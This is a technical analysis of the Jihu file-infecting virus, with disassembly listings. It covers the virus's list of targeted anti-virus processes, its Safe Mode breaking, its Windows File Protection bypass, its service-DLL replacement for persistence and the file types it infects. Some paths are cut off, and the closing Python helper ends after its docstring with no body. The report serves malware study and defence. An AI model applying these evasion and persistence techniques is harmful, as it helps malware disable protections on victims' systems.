极虎 (Jihu) Virus Analysis Report

Updated: 2024-04-17 02:25:01


The analysis was done in a hurry and some of the behaviour was not examined closely; corrections are welcome ^_^

1. Overview

This document describes the behaviour and technical details of a variant of the 极虎 (Jihu) virus.

The virus spreads mainly over the Internet and local networks. The sample is 248,832 bytes; the language it was written in is not known. On startup it determines where its own module is loaded: if its code lives in the process's main module (the author describes this as image base 0x00400000) it treats itself as an EXE, opens the Service Control Manager, searches the service list for a suitable service DLL and replaces that DLL with a copy of itself patched to carry DLL characteristics. If its code is not in the main module it is running as a DLL: it then breaks Safe Mode, terminates anti-virus software, downloads trojans, infects files of the specified types, infects removable disks and attacks LAN users.

2. Behaviour summary

1) Virus name: 极虎 (Jihu) virus, also known as 虎虎生威
2) Virus type: file infector
3) Size: 248,832 bytes
4) Propagation: Internet, LAN, removable storage media, drive-by web pages
5) Related files:
   a. 【极虎病毒】分析报告.doc : this analysis report
   b. 极虎病毒exe.v : the virus sample
   c. 极虎病毒.idb : the IDA database for the sample

6) Detailed behaviour:

a. It compares the allocation base of its own code with the process's main module handle (GetModuleHandle(NULL); the author calls this 0x00400000). If they are equal it is running as an EXE: it reads itself into memory, patches the PE header so the image has DLL characteristics, then walks a list of services looking for one that is stopped and replaces that service's DLL with the patched copy of itself.

b. When loaded as a DLL it first looks for the avp.exe and bdagent.exe processes; if one is found it writes a block of NOPs to bypass it and then deletes it. It drops a driver file in the temp folder, loads it and deletes the file. It then sets the service that corresponds to its own module to start at boot.

c. It uses the driver to interfere with and terminate anti-virus software, sending IOCTLs to the driver both to install hooks and to kill AV processes. The process names targeted (reproduced as stored in the sample, duplicates included): KVMonXP.kxp, KVSrvXP.exe, avp.exe, avp.exe, avp.exe, RavMonD.exe, RavTask.exe, RsAgent.exe, rsnetsvr.exe, RsTray.exe, ScanFrm.exe, CCenter.exe, kavstart.exe, kissvc.exe, kpfw32.exe, kpfwsvc.exe, kswebshield.exe, kwatch.exe, kmailmon.exe, egui.exe, ekrn.exe, ccSvcHst.exe, ccSvcHst.exe, ccSvcHst.exe, Mcagent.exe, mcmscsvc.exe, McNASvc.exe, Mcods.exe, McProxy.exe, Mcshield.exe, mcsysmon.exe, mcvsshld.exe, MpfSrv.exe, McSACore.exe, msksrver.exe, sched.exe, avguard.exe, avmailc.exe, avwebgrd.exe, avgnt.exe, sched.exe, avguard.exe, avcenter.exe, UfSeAgnt.exe, TMBMSRV.exe, SfCtlCom.exe, TmProxy.exe, 360SoftMgrSvc.exe, 360tray.exe, qutmserv.exe, bdagent.exe, livesrv.exe, seccenter.exe, vsserv.exe, MPSVC.exe, MPSVC1.exe, MPSVC2.exe, MPMon.exe, ast.exe, 360speedld.exe, 360SoftMgrSvc.exe, 360tray.exe, 修复工具.exe, 360hotfix.exe, 360rpt.exe, 360safe.exe, 360safebox.exe, krnl360svc.exe, zhudongfangyu.exe, 360sd.exe, 360rp.exe, 360se.exe, safeboxTray.exe.

d. It deletes the registry keys SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal and SYSTEM\CurrentControlSet\Control\SafeBoot\Network to break Safe Mode, and modifies the hosts file. It infects files of the types exe, asp, aspx, htm, html and rar. For EXE files it adds a section header named .tc and writes a block of shellcode at the end of the file; for RAR archives it extracts the archive to the temp folder, infects the contents and repacks them; for the other types it appends a script at the end of the file. Before infecting, it skips the system paths WinRAR, WindowsUpdate, Windows NT, Windows Media Player, Outlook Express, NetMeeting, MSN Gaming Zone, Movie Maker, microsoft frontpage, Messenger, Internet Explorer, InstallShield Installation Information, ComPlus Applications, Common Files, RECYCLER, System Volume Information, Documents and Settings, WinNT and WINDOWS.

3. Cleanup

Because the virus breaks Safe Mode and infects most files on the machine, manual removal is difficult; a dedicated removal tool is recommended.

4. Main text

The entry code first decides whether it is running as the main executable or as a DLL. It obtains its own address with call $+5, asks VirtualQuery for the AllocationBase of that address and compares it with GetModuleHandle(NULL):

.text:00401B7E call $+5
.text:00401B83 mov eax, [esp+2Ch+var_2C] ; current address (return address pushed by call $+5)
.text:00401B86 mov [ebp+lpAddress], eax
.text:00401B89 pop eax
.text:00401B8A push 1Ch ; size_t
.text:00401B8C push 0 ; int
.text:00401B8E lea eax, [ebp+Buffer]
.text:00401B91 push eax ; void *
.text:00401B92 call memset
.text:00401B97 add esp, 0Ch
.text:00401B9A push 1Ch ; dwLength
.text:00401B9C lea eax, [ebp+Buffer]
.text:00401B9F push eax ; lpBuffer
.text:00401BA0 push [ebp+lpAddress] ; lpAddress
.text:00401BA3 call ds:VirtualQuery
.text:00401BA9 mov eax, [ebp+Buffer.AllocationBase]
.text:00401BAC mov hModule, eax
.text:00401BB1 push 0 ; lpModuleName
.text:00401BB3 call ds:GetModuleHandleA
.text:00401BB9 cmp eax, hModule ; is our allocation base the main module?
.text:00401BBF jnz short DllFile ; not the main module: running as a DLL
.text:00401BC1 push [ebp+arg_C]
.text:00401BC4 push [ebp+arg_8]
.text:00401BC7 push [ebp+arg_4]
.text:00401BCA push [ebp+arg_0]
.text:00401BCD call ExeRun ; runs when the file is an EXE
.text:00401BD2 mov [ebp+var_24], eax
.text:00401BD5 jmp short loc_401BE8
.text:00401BD7 DllFile:
.text:00401BD7 push [ebp+arg_8]
.text:00401BDA push [ebp+arg_4]
.text:00401BDD push [ebp+arg_0]
.text:00401BE0 call DllRun ; runs when the file is a DLL

When running as an EXE it first tries to open the named pipe \\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E. If the open succeeds it reads data from the pipe; if it fails it inspects the error code, and if every instance of the pipe is busy it terminates. The implementation:

.text:0040657E push 0 ; hTemplateFile
.text:00406580 push 0 ; dwFlagsAndAttributes
.text:00406582 push 3 ; dwCreationDisposition = OPEN_EXISTING
.text:00406584 push 0 ; lpSecurityAttributes
.text:00406586 push 0 ; dwShareMode
.text:00406588 push 0C0000000h ; dwDesiredAccess = GENERIC_READ | GENERIC_WRITE
.text:0040658D push [ebp+lpFileName] ; lpFileName
.text:00406590 call ds:CreateFileA ; try to open the pipe \
.text:00406596 mov [ebp+hObject], eax
.text:00406599 cmp [ebp+hObject], 0FFFFFFFFh ; INVALID_HANDLE_VALUE
.text:0040659D jnz short loc_4065C7 ; open succeeded: jump
.text:0040659F push 1 ; Buffer
.text:004065A1 lea eax, [ebp+String2]
.text:004065A7 push eax ; lpBuffer
.text:004065A8 call CreateBin ; open failed: create the \ file
.text:004065AD call ds:GetLastError
.text:004065B3 cmp eax, 0E7h ; ERROR_PIPE_BUSY (231): all pipe instances are in use
.text:004065B8 jnz short Over_0 ; any other error: leave
.text:004065BA push 0 ; uExitCode
.text:004065BC call ds:ExitProcess ; pipe busy: terminate

Note that GetLastError is only read after CreateBin returns, so the ERROR_PIPE_BUSY test only works if CreateBin leaves the thread's last-error value untouched. When the pipe opens successfully, execution continues here:

=============================================================

.text:004065C7 mov [ebp+Mode], 2 ; PIPE_READMODE_MESSAGE
.text:004065CE push 0 ; lpCollectDataTimeout
.text:004065D0 push 0 ; lpMaxCollectionCount
.text:004065D2 lea eax, [ebp+Mode]
.text:004065D5 push eax ; lpMode
.text:004065D6 push [ebp+hObject] ; hNamedPipe
.text:004065D9 call ds:SetNamedPipeHandleState ; message read mode, blocking wait
.text:004065DF push 0 ; lpOverlapped
.text:004065E1 lea eax, [ebp+NumberOfBytesRead]
.text:004065E4 push eax ; lpNumberOfBytesWritten
.text:004065E5 push 2 ; nNumberOfBytesToWrite
.text:004065E7 push offset byte_40BE6C ; lpBuffer
.text:004065EC push [ebp+hObject] ; hFile
.text:004065EF call ds:WriteFile ; write the 2 bytes at byte_40BE6C ("DD" according to the author) into the pipe
.text:004065F5 push 0 ; lpOverlapped
.text:004065F7 lea eax, [ebp+NumberOfBytesRead]
.text:004065FA push eax ; lpNumberOfBytesRead
.text:004065FB push 104h ; nNumberOfBytesToRead
.text:00406600 push offset String ; lpBuffer
.text:00406605 push [ebp+hObject] ; hFile
.text:00406608 call ds:ReadFile ; read the reply from the pipe
.text:0040660E push offset String ; lpString
.text:00406613 call ds:lstrlenA
.text:00406619 test eax, eax
.text:0040661B jnz short ReadSucceed ; non-empty reply: read succeeded
.text:0040661D push [ebp+hObject] ; hObject
.text:00406620 call ds:CloseHandle
.text:00406626 push 1 ; Buffer
.text:00406628 lea eax, [ebp+String2]
.text:0040662E push eax ; lpBuffer
.text:0040662F call CreateBin
.text:00406634 push 0 ; uExitCode
.text:00406636 call ds:ExitProcess ; empty reply: terminate

Once the reply has been read, strrchr is used to locate the last '.' (0x2E) in it. The EXE then reopens the pipe repeatedly until the open fails with ERROR_FILE_NOT_FOUND, i.e. until the pipe has disappeared, polling at most 0x64 (100) times with a 0x32 (50) ms sleep between attempts:

.text:0040666C Next:
.text:0040666C mov eax, [ebp+var_26C]
.text:00406672 inc eax
.text:00406673 mov [ebp+var_26C], eax
.text:00406679 loc_406679:
.text:00406679 cmp [ebp+var_26C], 64h ; at most 100 attempts
.text:00406680 jge short Over_1
.text:00406682 push 0 ; hTemplateFile
.text:00406684 push 0 ; dwFlagsAndAttributes
.text:00406686 push 3 ; dwCreationDisposition = OPEN_EXISTING
.text:00406688 push 0 ; lpSecurityAttributes
.text:0040668A push 0 ; dwShareMode
.text:0040668C push 0C0000000h ; dwDesiredAccess = GENERIC_READ | GENERIC_WRITE
.text:00406691 push [ebp+lpFileName] ; lpFileName
.text:00406694 call ds:CreateFileA ; try to open \
.text:0040669A mov [ebp+hObject], eax
.text:0040669D cmp [ebp+hObject], 0FFFFFFFFh
.text:004066A1 jnz short OpenPipeFail ; (despite the label, this is the open-succeeded path)
.text:004066A3 call ds:GetLastError
.text:004066A9 cmp eax, 2 ; ERROR_FILE_NOT_FOUND
.text:004066AC jnz short Next_1
.text:004066AE jmp short Over_1 ; the pipe is gone: leave the loop
.text:004066B0 Next_1:
.text:004066B0 jmp short GetNext
.text:004066B2 OpenPipeFail:
.text:004066B2 push [ebp+hObject] ; hObject
.text:004066B5 call ds:CloseHandle
.text:004066BB GetNext:
.text:004066BB push 32h ; dwMilliseconds
.text:004066BD call ds:Sleep ; sleep 0x32 (50) ms
.text:004066C3 jmp short Next

Next it obtains its own full path, allocates a heap buffer, reads itself into it and patches the PE header:

.text:00401C0B push 104h ; nSize
.text:00401C10 lea eax, [ebp+FileName]
.text:00401C16 push eax ; lpFilename
.text:00401C17 push [ebp+hModule] ; hModule
.text:00401C1A call ds:GetModuleFileNameA
.text:00401C20 and [ebp+var_120], 0
.text:00401C27 jmp short loc_401C36
.text:00401C29 loc_401C29:
.text:00401C29 mov eax, [ebp+var_120]
.text:00401C2F inc eax
.text:00401C30 mov [ebp+var_120], eax
.text:00401C36 loc_401C36:
.text:00401C36 cmp [ebp+var_120], 32h ; up to 0x32 (50) open attempts
.text:00401C3D jge short loc_401C70
.text:00401C3F push 0 ; hTemplateFile
.text:00401C41 push 0 ; dwFlagsAndAttributes
.text:00401C43 push 3 ; dwCreationDisposition = OPEN_EXISTING
.text:00401C45 push 0 ; lpSecurityAttributes
.text:00401C47 push 1 ; dwShareMode = FILE_SHARE_READ
.text:00401C49 push 80000000h ; dwDesiredAccess = GENERIC_READ
.text:00401C4E lea eax, [ebp+FileName] ; its own path
.text:00401C54 push eax ; lpFileName
.text:00401C55 call ds:CreateFileA ; open its own file
.text:00401C5B mov [ebp+hObject], eax
.text:00401C5E cmp [ebp+hObject], 0FFFFFFFFh
.text:00401C62 jz short loc_401C66 ; open failed
.text:00401C64 jmp short loc_401C70
.text:00401C66 loc_401C66:
.text:00401C66 push 64h ; dwMilliseconds
.text:00401C68 call ds:Sleep
.text:00401C6E jmp short loc_401C29 ; retry
.text:00401C70 loc_401C70:
.text:00401C70 push 0 ; lpFileSizeHigh
.text:00401C72 push [ebp+hObject] ; hFile
.text:00401C75 call ds:GetFileSize ; open succeeded: get the file size
.text:00401C7B mov [ebp+nNumberOfBytesToRead], eax
.text:00401C7E cmp [ebp+nNumberOfBytesToRead], 0
.text:00401C82 jz short loc_401C8A ; size 0: close the handle and return
.text:00401C84 cmp [ebp+nNumberOfBytesToRead], 0FFFFFFFFh
.text:00401C88 jnz short loc_401CA6 ; valid size: allocate memory and read
.text:00401C8A loc_401C8A:
.text:00401C8A push [ebp+hObject] ; hObject
.text:00401C8D call ds:CloseHandle
.text:00401C93 mov eax, [ebp+arg_4]
.text:00401C96 and dword ptr [eax], 0 ; *arg_4 = NULL
.text:00401C99 mov eax, [ebp+arg_8]
.text:00401C9C and dword ptr [eax], 0 ; *arg_8 = 0
.text:00401C9F xor eax, eax
.text:00401CA1 jmp locret_401D57
.text:00401CA6 loc_401CA6:
.text:00401CA6 mov eax, [ebp+arg_8]
.text:00401CA9 mov ecx, [ebp+nNumberOfBytesToRead]
.text:00401CAC mov [eax], ecx ; *arg_8 = file size
.text:00401CAE mov eax, [ebp+nNumberOfBytesToRead]
.text:00401CB1 add eax, 20h
.text:00401CB4 push eax ; unsigned int
.text:00401CB5 call ??2@YAPAXI@Z ; operator new(uint): file size + 0x20
.text:00401CBA pop ecx
.text:00401CBB mov [ebp+var_124], eax
.text:00401CC1 mov eax, [ebp+var_124]
.text:00401CC7 mov [ebp+lpBuffer], eax
.text:00401CCD mov eax, [ebp+arg_4]
.text:00401CD0 mov ecx, [ebp+lpBuffer]
.text:00401CD6 mov [eax], ecx ; *arg_4 = buffer
.text:00401CD8 mov eax, [ebp+nNumberOfBytesToRead]
.text:00401CDB add eax, 20h
.text:00401CDE push eax ; size_t
.text:00401CDF push 0 ; int
.text:00401CE1 push [ebp+lpBuffer] ; void *
.text:00401CE7 call memset ; zero the allocated buffer
.text:00401CEC add esp, 0Ch
.text:00401CEF push 0 ; lpOverlapped
.text:00401CF1 lea eax, [ebp+NumberOfBytesRead]
.text:00401CF4 push eax ; lpNumberOfBytesRead
.text:00401CF5 push [ebp+nNumberOfBytesToRead] ; nNumberOfBytesToRead
.text:00401CF8 push [ebp+lpBuffer] ; lpBuffer
.text:00401CFE push [ebp+hObject] ; hFile
.text:00401D01 call ds:ReadFile ; read the whole file into the buffer
.text:00401D07 push [ebp+hObject] ; hObject
.text:00401D0A call ds:CloseHandle
.text:00401D10 and [ebp+var_10], 0
.text:00401D14 mov eax, [ebp+lpBuffer]
.text:00401D1A mov ecx, [ebp+lpBuffer]
.text:00401D20 add ecx, [eax+3Ch] ; e_lfanew, the last field of the DOS header: ecx now points at the NT headers
.text:00401D23 mov [ebp+var_10], ecx
.text:00401D26 cmp [ebp+hModule], 0
.text:00401D2A jz short loc_401D41 ; hModule == 0 means it read itself
.text:00401D2C mov eax, [ebp+var_10]
.text:00401D2F movzx eax, word ptr [eax+16h] ; FileHeader.Characteristics
.text:00401D33 and eax, 0DFFFh ; mask with ~IMAGE_FILE_DLL (0x2000)

The author describes this step as giving the image DLL characteristics. Note that the instruction actually shown at 0x401D33 clears IMAGE_FILE_DLL, and it is on the branch taken when hModule is non-zero; the branch at loc_401D41 for the hModule == 0 (read itself) case is not reproduced in the listing.

It then obtains the temp folder and the Windows directory and loads a library (its name is cut off in the text; the variable FunNO5sfc_os shows it is sfc_os.dll) to resolve the function exported as ordinal 5. Ordinal 5 of sfc_os.dll is the undocumented SfcFileException, which exempts a file from Windows File Protection, so the system DLL it is about to replace is not restored. If the library fails to load it falls back to reading the service list from the registry (GetVauleReg). Otherwise it opens the Service Control Manager (the original text says "device manager", but the call is OpenSCManagerA) and walks its built-in table of service names: when a service is stopped it replaces that service's DLL with the DLL-flagged copy of itself, restarts the service and exits; when the replacement fails it goes back for the next entry. The table is walked twice: on the first pass only services that are already stopped are touched, on the second pass (var_784 set) running services are stopped with ControlService first.

.text:004020AE push 104h ; uSize
.text:004020B3 lea eax, [ebp+Buffer]
.text:004020B9 push eax ; lpBuffer
.text:004020BA call ds:GetWindowsDirectoryA ; Windows directory
.text:004020C0 push 104h ; size_t
.text:004020C5 push 0 ; int
.text:004020C7 lea eax, [ebp+TempPath]
.text:004020CD push eax ; void *
.text:004020CE call memset
.text:004020D3 add esp, 0Ch
.text:004020D6 lea eax, [ebp+TempPath]
.text:004020DC push eax ; lpBuffer
.text:004020DD push 104h ; nBufferLength
.text:004020E2 call ds:GetTempPathA ; temp folder
.text:004020E8 push 0F003Fh ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
.text:004020ED push 0 ; lpDatabaseName
.text:004020EF push 0 ; lpMachineName
.text:004020F1 call ds:OpenSCManagerA ; open the Service Control Manager
.text:004020F7 mov [ebp+hSCManager], eax
.text:004020FA push offset LibFileName ; \ (sfc_os.dll, see FunNO5sfc_os below)
.text:004020FF call ds:LoadLibraryA
.text:00402105 mov [ebp+hLibModule], eax
.text:0040210B cmp [ebp+hLibModule], 0
.text:00402112 jnz short GetFunAddNo5 ; loaded: resolve ordinal 5
.text:00402114 jmp GetVauleReg ; load failed: use the registry instead
.text:00402119 jmp GetVauleReg
.text:0040211E GetFunAddNo5:
.text:0040211E push 5 ; lpProcName = ordinal 5
.text:00402120 push [ebp+hLibModule] ; hModule
.text:00402126 call ds:GetProcAddress ; address of ordinal 5
.text:0040212C mov FunNO5sfc_os, eax
.text:00402141 NextService:
.text:00402141 mov eax, [ebp+var_B8C]
.text:00402147 inc eax
.text:00402148 mov [ebp+var_B8C], eax ; next table index
.text:0040214E loc_40214E:
.text:0040214E push [ebp+var_B8C] ; int (index)
.text:00402154 push 0 ; int
.text:00402156 push 40h ; int
.text:00402158 lea eax, [ebp+ServiceName]
.text:0040215E push eax ; lpString1
.text:0040215F call sub_401879 ; decode service name #index from the embedded table
.text:00402164 cmp eax, 0FFFFFFFFh ; -1: end of the table
.text:00402167 jnz short loc_40218A
.text:00402169 cmp [ebp+var_784], 0 ; already on the second pass?
.text:00402170 jnz short loc_402185
.text:00402172 mov [ebp+var_784], 1 ; start the second pass (stop running services)
.text:0040217C or [ebp+var_B8C], 0FFFFFFFFh ; index = -1
.text:00402183 jmp short NextService
.text:00402185 loc_402185:
.text:00402185 jmp GetVauleReg ; both passes exhausted: fall back to the registry
.text:0040218A loc_40218A:
.text:0040218A push [ebp+var_B8C] ; int
.text:00402190 push 1 ; int
.text:00402192 push 40h ; int
.text:00402194 lea eax, [ebp+String1]
.text:0040219A push eax ; lpString1
.text:0040219B call sub_401879 ; decode the second field of entry #index
.text:004021A0 push offset String ; lpString2: the buffer filled from the pipe earlier
.text:004021A5 lea eax, [ebp+String1]
.text:004021AB push eax ; lpString1
.text:004021AC call ds:lstrcmpiA
.text:004021B2 test eax, eax
.text:004021B4 jnz short loc_4021B8
.text:004021B6 jmp short NextService ; equal to the pipe string: skip this entry
.text:004021B8 loc_4021B8:
.text:004021B8 push 0F01FFh ; dwDesiredAccess = SERVICE_ALL_ACCESS
.text:004021BD lea eax, [ebp+ServiceName]
.text:004021C3 push eax ; lpServiceName
.text:004021C4 push [ebp+hSCManager] ; hSCManager
.text:004021C7 call ds:OpenServiceA
.text:004021CD mov [ebp+hSCObject], eax
.text:004021D3 cmp [ebp+hSCObject], 0
.text:004021DA jnz short OpenSucceed ; service opened
.text:004021DC jmp NextService
.text:004021E1 OpenSucceed:
.text:004021E1 push 1Ch ; size_t
.text:004021E3 push 0 ; int
.text:004021E5 lea eax, [ebp+ServiceStatus]
.text:004021EB push eax ; void *
.text:004021EC call memset
.text:004021F1 add esp, 0Ch
.text:004021F4 lea eax, [ebp+ServiceStatus]
.text:004021FA push eax ; lpServiceStatus
.text:004021FB push [ebp+hSCObject] ; hService
.text:00402201 call ds:QueryServiceStatus ; query the service state
.text:00402207 cmp [ebp+ServiceStatus.dwCurrentState], 1 ; SERVICE_STOPPED
.text:0040220E jz short ReplaceDll ; stopped: replace its DLL
.text:00402210 cmp [ebp+var_784], 0
.text:00402217 jnz short ControlThisService ; second pass: stop it ourselves
.text:00402219 jmp CloseThisNext ; first pass: close it and take the next entry
.text:00402223 ControlThisService:
.text:00402223 lea eax, [ebp+ServiceStatus]
.text:00402229 push eax ; lpServiceStatus
.text:0040222A push 1 ; dwControl = SERVICE_CONTROL_STOP
.text:0040222C push [ebp+hSCObject] ; hService
.text:00402232 call ds:ControlService ; stop the running service
.text:00402238 test eax, eax
.text:0040223A jnz short ReplaceDll ; stopped: replace its DLL
.text:0040223C jmp CloseThisNext ; could not stop it: close and take the next entry
.text:00402246 ReplaceDll:
.text:00402246 push 104h ; size_t
.text:0040224B push 0 ; int
.text:0040224D lea eax, [ebp+FileName]
.text:00402253 push eax ; void *
.text:00402254 call memset
.text:00402259 add esp, 0Ch
.text:0040225C lea eax, [ebp+String1]
.text:00402262 push eax
.text:00402263 lea eax, [ebp+Buffer]
.text:00402269 push eax
.text:0040226A push offset aSSystem32S_dll ; \ (IDA's name suggests a "%s\system32\%s.dll" format string)
.text:0040226F lea eax, [ebp+FileName]
.text:00402275 push eax ; LPSTR
.text:00402276 call ds:wsprintfA ; build the DLL path (value seen while debugging: \)
.text:0040227C add esp, 10h
.text:0040227F lea eax, [ebp+FileName]
.text:00402285 push eax ; lpFileName
.text:00402286 call ReplaceDll ; replace the DLL and set its creation time back to the original (value seen while debugging: \)
.text:0040228B test eax, eax
.text:0040228D jnz short GoStarService
.text:00402291 jmp short CloseThisNext ; replacement failed: close and take the next entry
.text:00402293 GoStarService:
.text:00402293 push 0 ; lpServiceArgVectors
.text:00402295 push 0 ; dwNumServiceArgs
.text:00402297 push [ebp+hSCObject] ; hService
.text:0040229D call ds:StartServiceA ; start the service that was stopped
.text:004022A3 test eax, eax
.text:004022A5 jnz short ServiceOver ; restarted: clean up and exit
.text:004022A7 jmp short CloseThisNext ; start failed: close and take the next entry
.text:004022A9 jmp short CloseThisNext
.text:004022AB ServiceOver:
.text:004022AB push [ebp+hLibModule] ; hLibModule
.text:004022B1 call ds:FreeLibrary
.text:004022B7 push [ebp+hSCObject] ; hSCObject
.text:004022BD call ds:CloseServiceHandle
.text:004022C3 push [ebp+hSCManager] ; hSCObject
.text:004022C6 call ds:CloseServiceHandle
.text:004022CC cmp dword_40DC3C, 0
.text:004022D3 jz short ExitThisProcess
.text:004022D5 mov eax, dword_40DC3C
.text:004022DA mov [ebp+var_C30], eax
.text:004022E0 push [ebp+var_C30] ; void *
.text:004022E6 call ??3@YAXPAX@Z ; operator delete(void *)
.text:004022EB pop ecx
.text:004022EC ExitThisProcess:
.text:004022EC push 0 ; uExitCode
.text:004022EE call ds:ExitProcess ; DLL replaced and service restarted: terminate
.text:004022F4 CloseThisNext:
.text:004022F4 push [ebp+hSCObject] ; hSCObject
.text:004022FA call ds:CloseServiceHandle
.text:00402300 jmp NextService ; back for the next entry

When decoding the table fails or the library cannot be loaded, the service names are read from the registry instead. The value name is assembled on the stack from two immediates (7374656Eh, 736376h = "netsvcs"), i.e. the svchost group list that normally lives under SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost:

.text:00402305 GetVauleReg:
.text:00402305 push 400h ; size_t
.text:0040230A push 0 ; int
.text:0040230C lea eax, [ebp+Data]
.text:00402312 push eax ; void *
.text:00402313 call memset
.text:00402318 add esp, 0Ch
.text:0040231B mov [ebp+cbData], 400h
.text:00402322 lea eax, [ebp+hKey]
.text:00402325 push eax ; phkResult
.text:00402326 push 1 ; samDesired = KEY_QUERY_VALUE
.text:00402328 push 0 ; ulOptions
.text:0040232A push offset aSoftwareMicros ; \ (SOFTWARE\Microsoft\..., cut off here)
.text:0040232F push 80000002h ; hKey = HKEY_LOCAL_MACHINE
.text:00402334 call ds:RegOpenKeyExA
.text:0040233A mov dword ptr [ebp+ValueName], 7374656Eh ; "nets"
.text:00402344 mov [ebp+var_77C], 736376h ; "vcs\0": value name "netsvcs"
.text:0040234E lea eax, [ebp+cbData]
.text:00402351 push eax ; lpcbData
.text:00402352 lea eax, [ebp+Data]
.text:00402358 push eax ; lpData
.text:00402359 lea eax, [ebp+Type]
.text:0040235F push eax ; lpType
.text:00402360 push 0 ; lpReserved
.text:00402362 lea eax, [ebp+ValueName]
.text:00402368 push eax ; lpValueName
.text:00402369 push [ebp+hKey] ; hKey
.text:0040236C call ds:RegQueryValueExA ; read the netsvcs value (REG_MULTI_SZ)
.text:00402372 push [ebp+hKey] ; hKey
.text:00402375 call ds:RegCloseKey
.text:0040237B lea eax, [ebp+Data]
.text:00402381 mov [ebp+lpString], eax ; first string of the data read from the registry
.text:00402384 GetNext_1:
.text:00402384 mov eax, [ebp+lpString]
.text:00402387 movsx eax, byte ptr [eax]
.text:0040238A test eax, eax
.text:0040238C jz over_1 ; empty string: end of the list, leave
.text:00402392 push offset String ; lpString2: the buffer filled from the pipe
.text:00402397 push [ebp+lpString] ; lpString1
.text:0040239A call ds:lstrcmpiA
.text:004023A0 test eax, eax
.text:004023A2 jnz short loc_4023A6
.text:004023A4 jmp short GetNext_1 ; equal: jumps back without advancing lpString (as listed, this would loop forever)
.text:004023A6 loc_4023A6:
.text:004023A6 push 400h ; size_t
.text:004023AB push 0 ; int
.text:004023AD lea eax, [ebp+BinaryPathName]
.text:004023B3 push eax ; void *
.text:004023B4 call memset
.text:004023B9 add esp, 0Ch
.text:004023BC push offset aVcs ; \
.text:004023C1 push offset aOst_exe ; \
.text:004023C6 push offset aSystemrootSyst ; \
.text:004023CB push offset aSS_0 ; \ (format string)
.text:004023D0 lea eax, [ebp+BinaryPathName]
.text:004023D6 push eax ; LPSTR
.text:004023D7 call ds:wsprintfA ; assemble the image path from three fragments (IDA's names for them are consistent with a %SystemRoot%\System32\svchost.exe -k netsvcs command line)
.text:004023DD add esp, 14h
.text:004023E0 push 0 ; lpPassword
.text:004023E2 push 0 ; lpServiceStartName
.text:004023E4 push 0 ; lpDependencies
.text:004023E6 push 0 ; lpdwTagId
.text:004023E8 push 0 ; lpLoadOrderGroup
.text:004023EA lea eax, [ebp+BinaryPathName]
.text:004023F0 push eax ; lpBinaryPathName
.text:004023F1 push 1 ; dwErrorControl = SERVICE_ERROR_NORMAL
.text:004023F3 push 2 ; dwStartType = SERVICE_AUTO_START
.text:004023F5 push 20h ; dwServiceType = SERVICE_WIN32_SHARE_PROCESS
.text:004023F7 push 10h ; dwDesiredAccess = SERVICE_START
.text:004023F9 push [ebp+lpString] ; lpDisplayName
.text:004023FC push [ebp+lpString] ; lpServiceName
.text:004023FF push [ebp+hSCManager] ; hSCManager
.text:00402402 call ds:CreateServiceA ; create an auto-start svchost-hosted service under this name
.text:00402408 mov [ebp+hSCObject], eax
.text:0040240E cmp [ebp+hSCObject], 0
.text:00402415 jz Next_2
.text:0040241B push [ebp+lpString]
.text:0040241E lea eax, [ebp+Buffer]
.text:00402424 push eax
.text:00402425 push offset aSSystem32S_dll ; \
.text:0040242A lea eax, [ebp+FileName]
.text:00402430 push eax ; LPSTR
.text:00402431 call ds:wsprintfA
.text:00402437 add esp, 10h
.text:0040243A lea eax, [ebp+FileName]
.text:00402440 push eax ; lpData
.text:00402441 push [ebp+lpString] ; int
.text:00402444 call GetDllName ; read the service's DLL name from the registry
.text:00402449 lea eax, [ebp+FileName]
.text:0040244F push eax ; lpFileName
.text:00402450 call ReplaceDll ; replace that DLL
.text:00402455 test eax, eax
.text:00402457 jnz short ReadReplace ; replaced: start the service
.text:00402459 jmp short Next_2
.text:0040245B jmp short Next_2
.text:0040245D ReadReplace:
.text:0040245D push 0 ; lpServiceArgVectors
.text:0040245F push 0 ; dwNumServiceArgs
.text:00402461 push [ebp+hSCObject] ; hService
.text:00402467 call ds:StartServiceA
.text:0040246D test eax, eax
.text:0040246F jnz short Over_2 ; started: clean up and exit
.text:00402471 jmp short Next_2
.text:00402473 jmp short Next_2
.text:00402475 Over_2:
.text:00402475 push [ebp+hLibModule] ; hLibModule
.text:0040247B call ds:FreeLibrary
.text:00402481 push [ebp+hSCObject] ; hSCObject
.text:00402487 call ds:CloseServiceHandle
.text:0040248D push [ebp+hSCManager] ; hSCObject
.text:00402490 call ds:CloseServiceHandle
.text:00402496 cmp dword_40DC3C, 0
.text:0040249D jz short ExitThisProcess_1
.text:0040249F mov eax, dword_40DC3C
.text:004024A4 mov [ebp+var_C34], eax
.text:004024AA push [ebp+var_C34] ; void *
.text:004024B0 call ??3@YAXPAX@Z ; operator delete(void *)
.text:004024B5 pop ecx
.text:004024B6 ExitThisProcess_1:
.text:004024B6 push 0 ; uExitCode
.text:004024B8 call ds:ExitProcess
.text:004024BE Next_2:
.text:004024BE push [ebp+lpString] ; lpString
.text:004024C1 call ds:lstrlenA
.text:004024C7 mov ecx, [ebp+lpString]
.text:004024CA lea eax, [ecx+eax+1] ; step past the terminating NUL to the next string
.text:004024CE mov [ebp+lpString], eax
.text:004024D1 jmp GetNext_1
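Two details of this fallback are worth reproducing for anyone triaging a similar sample: the value name is assembled from little-endian immediates rather than stored as a string, and the REG_MULTI_SZ data is walked by stepping lstrlen + 1 until an empty string. The Python below is an added example, not code from the original report or from the sample; it decodes stack-built strings of that kind and reproduces the walk over a constructed netsvcs blob. The blob contents and the "pipe string" passed as the skip name are made up for the demonstration.

```python
import struct

# Constructed REG_MULTI_SZ blob standing in for HKLM\...\Svchost\netsvcs
# (two NULs terminate the list). Not taken from a real machine.
SAMPLE_NETSVCS = b"6to4\0AppMgmt\0Browser\0Nla\0\0"


def decode_stack_string(immediates, width=4):
    """Recover an ASCII string that code builds on the stack from
    little-endian immediates, e.g. mov dword ptr [ebp+X], 7374656Eh
    followed by mov [ebp+X+4], 736376h. Stops at the first NUL."""
    fmt = {4: "<I", 2: "<H", 1: "<B"}[width]
    raw = b"".join(struct.pack(fmt, v) for v in immediates)
    return raw.split(b"\0", 1)[0].decode("ascii")


def walk_multi_sz(data):
    """Iterate a REG_MULTI_SZ blob the way the loop at GetNext_1 does:
    read a NUL-terminated string, stop on an empty one, advance by
    lstrlen + 1 (the lea eax, [ecx+eax+1] at 0x4024CA)."""
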